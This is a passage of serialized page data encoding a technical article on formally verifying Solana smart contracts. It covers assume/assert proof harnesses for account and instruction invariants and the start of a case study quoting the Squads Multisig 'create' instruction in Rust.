:28649},{"style":28424},[28650,28654],{"type":24,"tag":301,"props":28651,"children":28653},{"className":28652,"style":10875},[10874],[],{"type":24,"tag":301,"props":28655,"children":28657},{"className":28656},[10880,10881,10882,10883],[28658],{"type":24,"tag":301,"props":28659,"children":28661},{"className":28660},[10835,10883],[28662,28667,28672,28681,28686,28695,28704,28709,28714,28719,28724],{"type":24,"tag":301,"props":28663,"children":28665},{"className":28664},[10835,28357,10883],[28666],{"type":30,"value":188},{"type":24,"tag":301,"props":28668,"children":28670},{"className":28669},[10835,28357,10883],[28671],{"type":30,"value":28448},{"type":24,"tag":301,"props":28673,"children":28675},{"className":28674},[10914,10883],[28676],{"type":24,"tag":301,"props":28677,"children":28679},{"className":28678},[10883],[28680],{"type":30,"value":28458},{"type":24,"tag":301,"props":28682,"children":28684},{"className":28683},[11017,10883],[28685],{"type":30,"value":28464},{"type":24,"tag":301,"props":28687,"children":28689},{"className":28688},[10914,10883],[28690],{"type":24,"tag":301,"props":28691,"children":28693},{"className":28692},[10883],[28694],{"type":30,"value":28458},{"type":24,"tag":301,"props":28696,"children":28698},{"className":28697},[10835,30,10883],[28699],{"type":24,"tag":301,"props":28700,"children":28702},{"className":28701},[10835,10883],[28703],{"type":30,"value":28298},{"type":24,"tag":301,"props":28705,"children":28707},{"className":28706},[28486,10883],[28708],{"type":30,"value":362},{"type":24,"tag":301,"props":28710,"children":28712},{"className":28711},[10835,28357,10883],[28713],{"type":30,"value":294},{"type":24,"tag":301,"props":28715,"children":28717},{"className":28716},[10835,28357,10883],[28718],{"type":30,"value":28499},{"type":24,"tag":301,"props":28720,"children":28722},{"className":28721},[10835,28357,10883],[28723],{"type":30,"value":26050},{"type":24,"tag":301,"props":28725,"children":28727},{"className":28726},[28508,10883],[28728],{"type":30,"value":9961},{"type":24,"tag":301,"props":28730,"children":28732},{"className":28731},[28514],[28733],{"type":30,"value":28517},{"type":24,"tag":301,"props":28735,"children":28737},{"className":28736},[10860],[28738],{"type":24,"tag":301,"props":28739,"children":28741},{"className":28740,"style":28525},[10865],[28742],{"type":24,"tag":301,"props":28743,"children":28744},{},[],{"type":24,"tag":301,"props":28746,"children":28748},{"className":28747,"style":10953},[10914],[],{"type":24,"tag":301,"props":28750,"children":28752},{"className":28751},[10835],[28753,28762,28767,28772,28777],{"type":24,"tag":301,"props":28754,"children":28756},{"className":28755},[10835,30],[28757],{"type":24,"tag":301,"props":28758,"children":28760},{"className":28759},[10835],[28761],{"type":30,"value":28547},{"type":24,"tag":301,"props":28763,"children":28765},{"className":28764},[28486],[28766],{"type":30,"value":362},{"type":24,"tag":301,"props":28768,"children":28770},{"className":28769},[10835,28357],[28771],{"type":30,"value":188},{"type":24,"tag":301,"props":28773,"children":28775},{"className":28774},[10835,28357],[28776],{"type":30,"value":28448},{"type":24,"tag":301,"props":28778,"children":28780},{"className":28779},[28508],[28781],{"type":30,"value":9961},{"type":24,"tag":32,"props":28783,"children":28784},{},[28785],{"type":30,"value":28786},"Our instruction invariants are represented as:",{"type":24,"tag":2655,"props":28788,"children":28789},{},[28790,28826],{"type":24,"tag":2659,"props":28791,"children":28792},{},[28793,28820,28821],{"type":24,"tag":145,"props":28794,"children":28796},{"className":28795},[10807,10808],[28797],{"type":24,"tag":301,"props":28798,"children":28800},{"className":28799},[10813],[28801],{"type":24,"tag":301,"props":28802,"children":28804},{"className":28803,"ariaHidden":10819},[10818],[28805],{"type":24,"tag":301,"props":28806,"children":28808},{"className":28807},[10824],[28809,28813],{"type":24,"tag":301,"props":28810,"children":28812},{"className":28811,"style":28352},[10829],[],{"type":24,"tag":301,"props":28814,"children":28817},{"className":28815,"style":28816},[10835,28357],"margin-right:0.05764em;",[28818],{"type":30,"value":28819},"S",{"type":30,"value":5615},{"type":24,"tag":145,"props":28822,"children":28824},{"className":28823},[],[28825],{"type":30,"value":26925},{"type":24,"tag":2659,"props":28827,"children":28828},{},[28829,28855,28856],{"type":24,"tag":145,"props":28830,"children":28832},{"className":28831},[10807,10808],[28833],{"type":24,"tag":301,"props":28834,"children":28836},{"className":28835},[10813],[28837],{"type":24,"tag":301,"props":28838,"children":28840},{"className":28839,"ariaHidden":10819},[10818],[28841],{"type":24,"tag":301,"props":28842,"children":28844},{"className":28843},[10824],[28845,28849],{"type":24,"tag":301,"props":28846,"children":28848},{"className":28847,"style":28352},[10829],[],{"type":24,"tag":301,"props":28850,"children":28852},{"className":28851,"style":28816},[10835,28357],[28853],{"type":30,"value":28854},"E",{"type":30,"value":5615},{"type":24,"tag":145,"props":28857,"children":28859},{"className":28858},[],[28860],{"type":30,"value":26932},{"type":24,"tag":32,"props":28862,"children":28863},{},[28864,28866,28893,28895,28900,28902,28908],{"type":30,"value":28865},"And ",{"type":24,"tag":145,"props":28867,"children":28869},{"className":28868},[10807,10808],[28870],{"type":24,"tag":301,"props":28871,"children":28873},{"className":28872},[10813],[28874],{"type":24,"tag":301,"props":28875,"children":28877},{"className":28876,"ariaHidden":10819},[10818],[28878],{"type":24,"tag":301,"props":28879,"children":28881},{"className":28880},[10824],[28882,28886],{"type":24,"tag":301,"props":28883,"children":28885},{"className":28884,"style":28352},[10829],[],{"type":24,"tag":301,"props":28887,"children":28890},{"className":28888,"style":28889},[10835,28357],"margin-right:0.07153em;",[28891],{"type":30,"value":28892},"K",{"type":30,"value":28894}," represents whether the instruction actually succeeds (i.e. invoking the handler returned an ",{"type":24,"tag":145,"props":28896,"children":28898},{"className":28897},[],[28899],{"type":30,"value":27260},{"type":30,"value":28901}," not an ",{"type":24,"tag":145,"props":28903,"children":28905},{"className":28904},[],[28906],{"type":30,"value":28907},"Err",{"type":30,"value":27511},{"type":24,"tag":32,"props":28910,"children":28911},{},[28912],{"type":30,"value":28913},"In order to verify these conditions we need to verify three cases:",{"type":24,"tag":80,"props":28915,"children":28917},{"id":28916},"account-invariants-1",[28918],{"type":30,"value":28919},"Account invariants",{"type":24,"tag":32,"props":28921,"children":28922},{},[28923,28925,28956,28958,28988,28990,29020],{"type":30,"value":28924},"After we execute an instruction, either the function should error and be reverted (",{"type":24,"tag":145,"props":28926,"children":28928},{"className":28927},[10807,10808],[28929],{"type":24,"tag":301,"props":28930,"children":28932},{"className":28931},[10813],[28933],{"type":24,"tag":301,"props":28934,"children":28936},{"className":28935,"ariaHidden":10819},[10818],[28937],{"type":24,"tag":301,"props":28938,"children":28940},{"className":28939},[10824],[28941,28945,28951],{"type":24,"tag":301,"props":28942,"children":28944},{"className":28943,"style":28352},[10829],[],{"type":24,"tag":301,"props":28946,"children":28948},{"className":28947},[10835],[28949],{"type":30,"value":28950},"¬",{"type":24,"tag":301,"props":28952,"children":28954},{"className":28953,"style":28889},[10835,28357],[28955],{"type":30,"value":28892},{"type":30,"value":28957},") or the account post-invariants should hold (",{"type":24,"tag":145,"props":28959,"children":28961},{"className":28960},[10807,10808],[28962],{"type":24,"tag":301,"props":28963,"children":28965},{"className":28964},[10813],[28966],{"type":24,"tag":301,"props":28967,"children":28969},{"className":28968,"ariaHidden":10819},[10818],[28970],{"type":24,"tag":301,"props":28971,"children":28973},{"className":28972},[10824],[28974,28978,28983],{"type":24,"tag":301,"props":28975,"children":28977},{"className":28976,"style":28352},[10829],[],{"type":24,"tag":301,"props":28979,"children":28981},{"className":28980,"style":28358},[10835,28357],[28982],{"type":30,"value":28361},{"type":24,"tag":301,"props":28984,"children":28986},{"className":28985},[10835],[28987],{"type":30,"value":546},{"type":30,"value":28989},"). Furthermore, we can assume that before executing a function, the account pre-invariants (",{"type":24,"tag":145,"props":28991,"children":28993},{"className":28992},[10807,10808],[28994],{"type":24,"tag":301,"props":28995,"children":28997},{"className":28996},[10813],[28998],{"type":24,"tag":301,"props":28999,"children":29001},{"className":29000,"ariaHidden":10819},[10818],[29002],{"type":24,"tag":301,"props":29003,"children":29005},{"className":29004},[10824],[29006,29010,29015],{"type":24,"tag":301,"props":29007,"children":29009},{"className":29008,"style":28352},[10829],[],{"type":24,"tag":301,"props":29011,"children":29013},{"className":29012,"style":28358},[10835,28357],[29014],{"type":30,"value":28361},{"type":24,"tag":301,"props":29016,"children":29018},{"className":29017},[10835],[29019],{"type":30,"value":584},{"type":30,"value":29021},") should hold since we will verify all of the functions eventually.",{"type":24,"tag":32,"props":29023,"children":29024},{},[29025,29027],{"type":30,"value":29026},"So we are trying to prove that ",{"type":24,"tag":145,"props":29028,"children":29030},{"className":29029},[10807,10808],[29031],{"type":24,"tag":301,"props":29032,"children":29034},{"className":29033},[10813],[29035],{"type":24,"tag":301,"props":29036,"children":29038},{"className":29037,"ariaHidden":10819},[10818],[29039,29076,29108],{"type":24,"tag":301,"props":29040,"children":29042},{"className":29041},[10824],[29043,29047,29052,29057,29062,29066,29072],{"type":24,"tag":301,"props":29044,"children":29046},{"className":29045,"style":10935},[10829],[],{"type":24,"tag":301,"props":29048,"children":29050},{"className":29049},[28486],[29051],{"type":30,"value":362},{"type":24,"tag":301,"props":29053,"children":29055},{"className":29054,"style":28358},[10835,28357],[29056],{"type":30,"value":28361},{"type":24,"tag":301,"props":29058,"children":29060},{"className":29059},[10835],[29061],{"type":30,"value":584},{"type":24,"tag":301,"props":29063,"children":29065},{"className":29064,"style":10915},[10914],[],{"type":24,"tag":301,"props":29067,"children":29069},{"className":29068},[10920],[29070],{"type":30,"value":29071},"∧",{"type":24,"tag":301,"props":29073,"children":29075},{"className":29074,"style":10915},[10914],[],{"type":24,"tag":301,"props":29077,"children":29079},{"className":29078},[10824],[29080,29084,29089,29094,29098,29104],{"type":24,"tag":301,"props":29081,"children":29083},{"className":29082,"style":10935},[10829],[],{"type":24,"tag":301,"props":29085,"children":29087},{"className":29086,"style":28889},[10835,28357],[29088],{"type":30,"value":28892},{"type":24,"tag":301,"props":29090,"children":29092},{"className":29091},[28508],[29093],{"type":30,"value":9961},{"type":24,"tag":301,"props":29095,"children":29097},{"className":29096,"style":11012},[10914],[],{"type":24,"tag":301,"props":29099,"children":29101},{"className":29100},[11017],[29102],{"type":30,"value":29103},"→",{"type":24,"tag":301,"props":29105,"children":29107},{"className":29106,"style":11012},[10914],[],{"type":24,"tag":301,"props":29109,"children":29111},{"className":29110},[10824],[29112,29116,29121],{"type":24,"tag":301,"props":29113,"children":29115},{"className":29114,"style":28352},[10829],[],{"type":24,"tag":301,"props":29117,"children":29119},{"className":29118,"style":28358},[10835,28357],[29120],{"type":30,"value":28361},{"type":24,"tag":301,"props":29122,"children":29124},{"className":29123},[10835],[29125],{"type":30,"value":546},{"type":24,"tag":32,"props":29127,"children":29128},{},[29129],{"type":30,"value":29130},"We can construct a proof harness like the following:",{"type":24,"tag":291,"props":29132,"children":29134},{"code":29133,"language":9219,"meta":7,"className":9220,"style":7},"assume(P0)\nres = instruction_handler(...)\nassert(!K || P1)\n",[29135],{"type":24,"tag":145,"props":29136,"children":29137},{"__ignoreMap":7},[29138,29146,29163],{"type":24,"tag":301,"props":29139,"children":29140},{"class":303,"line":304},[29141],{"type":24,"tag":301,"props":29142,"children":29143},{"style":359},[29144],{"type":30,"value":29145},"assume(P0)\n",{"type":24,"tag":301,"props":29147,"children":29148},{"class":303,"line":320},[29149,29154,29158],{"type":24,"tag":301,"props":29150,"children":29151},{"style":359},[29152],{"type":30,"value":29153},"res ",{"type":24,"tag":301,"props":29155,"children":29156},{"style":385},[29157],{"type":30,"value":523},{"type":24,"tag":301,"props":29159,"children":29160},{"style":359},[29161],{"type":30,"value":29162}," instruction_handler(...)\n",{"type":24,"tag":301,"props":29164,"children":29165},{"class":303,"line":335},[29166,29170,29174,29178,29183,29187],{"type":24,"tag":301,"props":29167,"children":29168},{"style":308},[29169],{"type":30,"value":26755},{"type":24,"tag":301,"props":29171,"children":29172},{"style":359},[29173],{"type":30,"value":362},{"type":24,"tag":301,"props":29175,"children":29176},{"style":6772},[29177],{"type":30,"value":2485},{"type":24,"tag":301,"props":29179,"children":29180},{"style":359},[29181],{"type":30,"value":29182},"K ",{"type":24,"tag":301,"props":29184,"children":29185},{"style":6772},[29186],{"type":30,"value":5632},{"type":24,"tag":301,"props":29188,"children":29189},{"style":359},[29190],{"type":30,"value":29191}," P1)\n",{"type":24,"tag":32,"props":29193,"children":29194},{},[29195],{"type":30,"value":29196},"By itself, this harness doesn't actually prove much. For example, if the instruction fails every time, this proof will still work. However, in conjunction with the two subsequent proofs we can be assured that the instruction will actually succeed when we expect it to.",{"type":24,"tag":80,"props":29198,"children":29200},{"id":29199},"positive-instruction-invariant",[29201],{"type":30,"value":29202},"Positive instruction invariant",{"type":24,"tag":32,"props":29204,"children":29205},{},[29206,29208,29214,29216,29267],{"type":30,"value":29207},"Next we need to prove that ",{"type":24,"tag":145,"props":29209,"children":29211},{"className":29210},[],[29212],{"type":30,"value":29213},"success_if",{"type":30,"value":29215}," is a sufficient condition for instruction success. I.e. ",{"type":24,"tag":145,"props":29217,"children":29219},{"className":29218},[10807,10808],[29220],{"type":24,"tag":301,"props":29221,"children":29223},{"className":29222},[10813],[29224],{"type":24,"tag":301,"props":29225,"children":29227},{"className":29226,"ariaHidden":10819},[10818],[29228,29254],{"type":24,"tag":301,"props":29229,"children":29231},{"className":29230},[10824],[29232,29236,29241,29245,29250],{"type":24,"tag":301,"props":29233,"children":29235},{"className":29234,"style":28352},[10829],[],{"type":24,"tag":301,"props":29237,"children":29239},{"className":29238,"style":28816},[10835,28357],[29240],{"type":30,"value":28819},{"type":24,"tag":301,"props":29242,"children":29244},{"className":29243,"style":11012},[10914],[],{"type":24,"tag":301,"props":29246,"children":29248},{"className":29247},[11017],[29249],{"type":30,"value":29103},{"type":24,"tag":301,"props":29251,"children":29253},{"className":29252,"style":11012},[10914],[],{"type":24,"tag":301,"props":29255,"children":29257},{"className":29256},[10824],[29258,29262],{"type":24,"tag":301,"props":29259,"children":29261},{"className":29260,"style":28352},[10829],[],{"type":24,"tag":301,"props":29263,"children":29265},{"className":29264,"style":28889},[10835,28357],[29266],{"type":30,"value":28892},{"type":30,"value":206},{"type":24,"tag":32,"props":29269,"children":29270},{},[29271],{"type":30,"value":29272},"Just like before we can construct a proof harness:",{"type":24,"tag":291,"props":29274,"children":29276},{"code":29275,"language":9219,"meta":7,"className":9220,"style":7},"assume(S)\nres = instruction_handler(...)\nassert(K)\n",[29277],{"type":24,"tag":145,"props":29278,"children":29279},{"__ignoreMap":7},[29280,29288,29303],{"type":24,"tag":301,"props":29281,"children":29282},{"class":303,"line":304},[29283],{"type":24,"tag":301,"props":29284,"children":29285},{"style":359},[29286],{"type":30,"value":29287},"assume(S)\n",{"type":24,"tag":301,"props":29289,"children":29290},{"class":303,"line":320},[29291,29295,29299],{"type":24,"tag":301,"props":29292,"children":29293},{"style":359},[29294],{"type":30,"value":29153},{"type":24,"tag":301,"props":29296,"children":29297},{"style":385},[29298],{"type":30,"value":523},{"type":24,"tag":301,"props":29300,"children":29301},{"style":359},[29302],{"type":30,"value":29162},{"type":24,"tag":301,"props":29304,"children":29305},{"class":303,"line":335},[29306,29310],{"type":24,"tag":301,"props":29307,"children":29308},{"style":308},[29309],{"type":30,"value":26755},{"type":24,"tag":301,"props":29311,"children":29312},{"style":359},[29313],{"type":30,"value":29314},"(K)\n",{"type":24,"tag":32,"props":29316,"children":29317},{},[29318,29320,29325,29327,29339],{"type":30,"value":29319},"This proof assures that whenever ",{"type":24,"tag":145,"props":29321,"children":29323},{"className":29322},[],[29324],{"type":30,"value":26925},{"type":30,"value":29326}," is satisfied, the instruction will succeed. However, remember that since this is not a biconditional, the instruction may also succeed ",{"type":24,"tag":5422,"props":29328,"children":29329},{},[29330,29332,29337],{"type":30,"value":29331},"even if ",{"type":24,"tag":145,"props":29333,"children":29335},{"className":29334},[],[29336],{"type":30,"value":26925},{"type":30,"value":29338}," is not satisfied",{"type":30,"value":29340},". To specify explicit error conditions we need our third and final proof.",{"type":24,"tag":80,"props":29342,"children":29344},{"id":29343},"_3-negative-instruction-invariant",[29345],{"type":30,"value":29346},"3. Negative instruction invariant",{"type":24,"tag":32,"props":29348,"children":29349},{},[29350,29352,29357,29359,29415],{"type":30,"value":29351},"Finally, we want to prove that ",{"type":24,"tag":145,"props":29353,"children":29355},{"className":29354},[],[29356],{"type":30,"value":26932},{"type":30,"value":29358}," is a sufficient condition for instruction failure. I.e. ",{"type":24,"tag":145,"props":29360,"children":29362},{"className":29361},[10807,10808],[29363],{"type":24,"tag":301,"props":29364,"children":29366},{"className":29365},[10813],[29367],{"type":24,"tag":301,"props":29368,"children":29370},{"className":29369,"ariaHidden":10819},[10818],[29371,29397],{"type":24,"tag":301,"props":29372,"children":29374},{"className":29373},[10824],[29375,29379,29384,29388,29393],{"type":24,"tag":301,"props":29376,"children":29378},{"className":29377,"style":28352},[10829],[],{"type":24,"tag":301,"props":29380,"children":29382},{"className":29381,"style":28816},[10835,28357],[29383],{"type":30,"value":28854},{"type":24,"tag":301,"props":29385,"children":29387},{"className":29386,"style":11012},[10914],[],{"type":24,"tag":301,"props":29389,"children":29391},{"className":29390},[11017],[29392],{"type":30,"value":29103},{"type":24,"tag":301,"props":29394,"children":29396},{"className":29395,"style":11012},[10914],[],{"type":24,"tag":301,"props":29398,"children":29400},{"className":29399},[10824],[29401,29405,29410],{"type":24,"tag":301,"props":29402,"children":29404},{"className":29403,"style":28352},[10829],[],{"type":24,"tag":301,"props":29406,"children":29408},{"className":29407},[10835],[29409],{"type":30,"value":28950},{"type":24,"tag":301,"props":29411,"children":29413},{"className":29412,"style":28889},[10835,28357],[29414],{"type":30,"value":28892},{"type":30,"value":206},{"type":24,"tag":32,"props":29417,"children":29418},{},[29419],{"type":30,"value":29420},"This harness looks just like the previous one:",{"type":24,"tag":291,"props":29422,"children":29424},{"code":29423,"language":9219,"meta":7,"className":9220,"style":7},"assume(E)\nres = instruction_handler(...)\nassert(!K)\n",[29425],{"type":24,"tag":145,"props":29426,"children":29427},{"__ignoreMap":7},[29428,29436,29451],{"type":24,"tag":301,"props":29429,"children":29430},{"class":303,"line":304},[29431],{"type":24,"tag":301,"props":29432,"children":29433},{"style":359},[29434],{"type":30,"value":29435},"assume(E)\n",{"type":24,"tag":301,"props":29437,"children":29438},{"class":303,"line":320},[29439,29443,29447],{"type":24,"tag":301,"props":29440,"children":29441},{"style":359},[29442],{"type":30,"value":29153},{"type":24,"tag":301,"props":29444,"children":29445},{"style":385},[29446],{"type":30,"value":523},{"type":24,"tag":301,"props":29448,"children":29449},{"style":359},[29450],{"type":30,"value":29162},{"type":24,"tag":301,"props":29452,"children":29453},{"class":303,"line":335},[29454,29458,29462,29466],{"type":24,"tag":301,"props":29455,"children":29456},{"style":308},[29457],{"type":30,"value":26755},{"type":24,"tag":301,"props":29459,"children":29460},{"style":359},[29461],{"type":30,"value":362},{"type":24,"tag":301,"props":29463,"children":29464},{"style":6772},[29465],{"type":30,"value":2485},{"type":24,"tag":301,"props":29467,"children":29468},{"style":359},[29469],{"type":30,"value":29470},"K)\n",{"type":24,"tag":32,"props":29472,"children":29473},{},[29474,29476,29480],{"type":30,"value":29475},"With these three harnesses, we are now able to formally verify that instructions succeed or fail when we expect them to ",{"type":24,"tag":5422,"props":29477,"children":29478},{},[29479],{"type":30,"value":23158},{"type":30,"value":29481}," the account invariants we expect are always being preserved.",{"type":24,"tag":43,"props":29483,"children":29485},{"id":29484},"case-study-squads-multisig",[29486],{"type":30,"value":29487},"Case study: Squads Multisig",{"type":24,"tag":32,"props":29489,"children":29490},{},[29491,29493,29498],{"type":30,"value":29492},"During our research, we focused on formally verifying aspects of the ",{"type":24,"tag":188,"props":29494,"children":29496},{"href":25601,"rel":29495},[192],[29497],{"type":30,"value":25605},{"type":30,"value":206},{"type":24,"tag":32,"props":29500,"children":29501},{},[29502,29504,29510,29512,29518],{"type":30,"value":29503},"The program defines a Multisig account (",{"type":24,"tag":145,"props":29505,"children":29507},{"className":29506},[],[29508],{"type":30,"value":29509},"Ms",{"type":30,"value":29511},") which has multiple members. These members can propose and then vote on transactions to execute on behalf of the multisig. If at least some ",{"type":24,"tag":145,"props":29513,"children":29515},{"className":29514},[],[29516],{"type":30,"value":29517},"threshold",{"type":30,"value":29519}," of members vote yes, the transaction will be invoked. Additionally, there is functionality to add/remove users and update the threshold.",{"type":24,"tag":32,"props":29521,"children":29522},{},[29523],{"type":30,"value":29524},"In practice, this structure provides a useful way to distribute authority across a group of individuals. From a formal verification perspective, it has both stateless and stateful features and constraints that provided a good testbed for our tooling.",{"type":24,"tag":32,"props":29526,"children":29527},{},[29528],{"type":30,"value":29529},"In this section we will go through a few examples of properties that we can verify on this program:",{"type":24,"tag":6246,"props":29531,"children":29532},{},[29533,29538,29543,29548],{"type":24,"tag":2659,"props":29534,"children":29535},{},[29536],{"type":30,"value":29537},"Incrementally verifying minimum requirements to create a multisig",{"type":24,"tag":2659,"props":29539,"children":29540},{},[29541],{"type":30,"value":29542},"Verify threshold requirements",{"type":24,"tag":2659,"props":29544,"children":29545},{},[29546],{"type":30,"value":29547},"Verify requirements to remove a member",{"type":24,"tag":2659,"props":29549,"children":29550},{},[29551],{"type":30,"value":29552},"Safety guarantees",{"type":24,"tag":80,"props":29554,"children":29556},{"id":29555},"_1-incrementally-verifying-minimum-requirements-to-create-a-multisig",[29557],{"type":30,"value":29558},"1. Incrementally verifying minimum requirements to create a multisig",{"type":24,"tag":32,"props":29560,"children":29561},{},[29562,29564,29569],{"type":30,"value":29563},"Suppose we want to verify the minimum requirements to create a multisig, i.e. the ",{"type":24,"tag":145,"props":29565,"children":29567},{"className":29566},[],[29568],{"type":30,"value":26925},{"type":30,"value":29570}," expression.",{"type":24,"tag":32,"props":29572,"children":29573},{},[29574,29576,29581,29583,29589],{"type":30,"value":29575},"Creating a multisig (",{"type":24,"tag":145,"props":29577,"children":29579},{"className":29578},[],[29580],{"type":30,"value":29509},{"type":30,"value":29582},") requires invoking the ",{"type":24,"tag":145,"props":29584,"children":29586},{"className":29585},[],[29587],{"type":30,"value":29588},"create",{"type":30,"value":29590}," instruction:",{"type":24,"tag":291,"props":29592,"children":29594},{"code":29593,"language":9817,"meta":7,"className":9818,"style":7},"#[derive(Accounts)]\n#[instruction(threshold: u16, create_key: Pubkey, members: Vec\u003CPubkey>)]\npub struct Create\u003C'info> {\n #[account(\n init,\n payer = creator,\n space = Ms::SIZE_WITHOUT_MEMBERS + (members.len() * 32),\n seeds = [b\"squad\", create_key.as_ref(), b\"multisig\"], bump\n )]\n pub multisig: Account\u003C'info, Ms>,\n\n #[account(mut)]\n pub creator: Signer\u003C'info>,\n pub system_program: Program\u003C'info, System>,\n}\n\npub fn create(\n ctx: Context\u003CCreate>,\n threshold: u16,\n create_key: Pubkey,\n members: Vec\u003CPubkey>,\n) -> Result\u003C()> {\n // sort the members and remove duplicates\n let mut members = members;\n members.sort();\n members.dedup();\n\n // check we don't exceed u16\n let total_members = members.len();\n if total_members \u003C 1 {\n return err!(MsError::EmptyMembers);\n }\n\n // make sure we don't exceed u16 on first call\n if total_members > usize::from(u16::MAX) {\n return err!(MsError::MaxMembersReached);\n }\n\n // make sure threshold is valid\n if usize::from(threshold) \u003C 1 || usize::from(threshold) > total_members {\n return err!(MsError::InvalidThreshold);\n }\n\n ctx.accounts.multisig.init(\n threshold,\n create_key,\n members,\n *ctx.bumps.get(\"multisig\").unwrap(),\n )\n}\n",[29595],{"type":24,"tag":145,"props":29596,"children":29597},{"__ignoreMap":7},[29598,29615,29670,29700,29708,29716,29733,29784,29833,29841,29882,29889,29905,29938,29980,29987,29994,30013,30041,30061,30081,30109,30128,30136,30164,30184,30204,30211,30219,30251,30274,30308,30315,30322,30330,30371,30403,30410,30417,30425,30499,30531,30538,30545,30581,30593,30605,30617,30670,30678],{"type":24,"tag":301,"props":29599,"children":29600},{"class":303,"line":304},[29601,29606,29611],{"type":24,"tag":301,"props":29602,"children":29603},{"style":359},[29604],{"type":30,"value":29605},"#[derive(",{"type":24,"tag":301,"props":29607,"children":29608},{"style":10246},[29609],{"type":30,"value":29610},"Accounts",{"type":24,"tag":301,"props":29612,"children":29613},{"style":359},[29614],{"type":30,"value":27029},{"type":24,"tag":301,"props":29616,"children":29617},{"class":303,"line":320},[29618,29623,29627,29631,29636,29640,29644,29649,29653,29657,29661,29665],{"type":24,"tag":301,"props":29619,"children":29620},{"style":359},[29621],{"type":30,"value":29622},"#[instruction(threshold",{"type":24,"tag":301,"props":29624,"children":29625},{"style":385},[29626],{"type":30,"value":1679},{"type":24,"tag":301,"props":29628,"children":29629},{"style":10246},[29630],{"type":30,"value":27799},{"type":24,"tag":301,"props":29632,"children":29633},{"style":359},[29634],{"type":30,"value":29635},", create_key",{"type":24,"tag":301,"props":29637,"children":29638},{"style":385},[29639],{"type":30,"value":1679},{"type":24,"tag":301,"props":29641,"children":29642},{"style":10246},[29643],{"type":30,"value":27626},{"type":24,"tag":301,"props":29645,"children":29646},{"style":359},[29647],{"type":30,"value":29648},", members",{"type":24,"tag":301,"props":29650,"children":29651},{"style":385},[29652],{"type":30,"value":1679},{"type":24,"tag":301,"props":29654,"children":29655},{"style":10246},[29656],{"type":30,"value":28158},{"type":24,"tag":301,"props":29658,"children":29659},{"style":359},[29660],{"type":30,"value":1849},{"type":24,"tag":301,"props":29662,"children":29663},{"style":10246},[29664],{"type":30,"value":28167},{"type":24,"tag":301,"props":29666,"children":29667},{"style":359},[29668],{"type":30,"value":29669},">)]\n",{"type":24,"tag":301,"props":29671,"children":29672},{"class":303,"line":335},[29673,29677,29681,29686,29691,29696],{"type":24,"tag":301,"props":29674,"children":29675},{"style":348},[29676],{"type":30,"value":20484},{"type":24,"tag":301,"props":29678,"children":29679},{"style":348},[29680],{"type":30,"value":27920},{"type":24,"tag":301,"props":29682,"children":29683},{"style":10246},[29684],{"type":30,"value":29685}," Create",{"type":24,"tag":301,"props":29687,"children":29688},{"style":359},[29689],{"type":30,"value":29690},"\u003C'",{"type":24,"tag":301,"props":29692,"children":29693},{"style":10246},[29694],{"type":30,"value":29695},"info",{"type":24,"tag":301,"props":29697,"children":29698},{"style":359},[29699],{"type":30,"value":14097},{"type":24,"tag":301,"props":29701,"children":29702},{"class":303,"line":344},[29703],{"type":24,"tag":301,"props":29704,"children":29705},{"style":359},[29706],{"type":30,"value":29707}," #[account(\n",{"type":24,"tag":301,"props":29709,"children":29710},{"class":303,"line":401},[29711],{"type":24,"tag":301,"props":29712,"children":29713},{"style":359},[29714],{"type":30,"value":29715}," init,\n",{"type":24,"tag":301,"props":29717,"children":29718},{"class":303,"line":415},[29719,29724,29728],{"type":24,"tag":301,"props":29720,"children":29721},{"style":359},[29722],{"type":30,"value":29723}," payer ",{"type":24,"tag":301,"props":29725,"children":29726},{"style":385},[29727],{"type":30,"value":523},{"type":24,"tag":301,"props":29729,"children":29730},{"style":359},[29731],{"type":30,"value":29732}," creator,\n",{"type":24,"tag":301,"props":29734,"children":29735},{"class":303,"line":439},[29736,29741,29745,29749,29753,29758,29762,29767,29771,29775,29779],{"type":24,"tag":301,"props":29737,"children":29738},{"style":359},[29739],{"type":30,"value":29740}," space ",{"type":24,"tag":301,"props":29742,"children":29743},{"style":385},[29744],{"type":30,"value":523},{"type":24,"tag":301,"props":29746,"children":29747},{"style":10246},[29748],{"type":30,"value":27925},{"type":24,"tag":301,"props":29750,"children":29751},{"style":385},[29752],{"type":30,"value":10308},{"type":24,"tag":301,"props":29754,"children":29755},{"style":10246},[29756],{"type":30,"value":29757},"SIZE_WITHOUT_MEMBERS",{"type":24,"tag":301,"props":29759,"children":29760},{"style":385},[29761],{"type":30,"value":957},{"type":24,"tag":301,"props":29763,"children":29764},{"style":359},[29765],{"type":30,"value":29766}," (members",{"type":24,"tag":301,"props":29768,"children":29769},{"style":385},[29770],{"type":30,"value":206},{"type":24,"tag":301,"props":29772,"children":29773},{"style":359},[29774],{"type":30,"value":27790},{"type":24,"tag":301,"props":29776,"children":29777},{"style":385},[29778],{"type":30,"value":772},{"type":24,"tag":301,"props":29780,"children":29781},{"style":359},[29782],{"type":30,"value":29783}," 32),\n",{"type":24,"tag":301,"props":29785,"children":29786},{"class":303,"line":447},[29787,29792,29796,29801,29806,29810,29814,29819,29824,29828],{"type":24,"tag":301,"props":29788,"children":29789},{"style":359},[29790],{"type":30,"value":29791}," seeds ",{"type":24,"tag":301,"props":29793,"children":29794},{"style":385},[29795],{"type":30,"value":523},{"type":24,"tag":301,"props":29797,"children":29798},{"style":359},[29799],{"type":30,"value":29800}," [",{"type":24,"tag":301,"props":29802,"children":29803},{"style":329},[29804],{"type":30,"value":29805},"b\"squad\"",{"type":24,"tag":301,"props":29807,"children":29808},{"style":359},[29809],{"type":30,"value":29635},{"type":24,"tag":301,"props":29811,"children":29812},{"style":385},[29813],{"type":30,"value":206},{"type":24,"tag":301,"props":29815,"children":29816},{"style":359},[29817],{"type":30,"value":29818},"as_ref(), ",{"type":24,"tag":301,"props":29820,"children":29821},{"style":329},[29822],{"type":30,"value":29823},"b\"multisig\"",{"type":24,"tag":301,"props":29825,"children":29826},{"style":359},[29827],{"type":30,"value":551},{"type":24,"tag":301,"props":29829,"children":29830},{"style":369},[29831],{"type":30,"value":29832},"bump\n",{"type":24,"tag":301,"props":29834,"children":29835},{"class":303,"line":476},[29836],{"type":24,"tag":301,"props":29837,"children":29838},{"style":359},[29839],{"type":30,"value":29840}," )]\n",{"type":24,"tag":301,"props":29842,"children":29843},{"class":303,"line":495},[29844,29848,29853,29857,29862,29866,29870,29874,29878],{"type":24,"tag":301,"props":29845,"children":29846},{"style":348},[29847],{"type":30,"value":27612},{"type":24,"tag":301,"props":29849,"children":29850},{"style":369},[29851],{"type":30,"value":29852}," 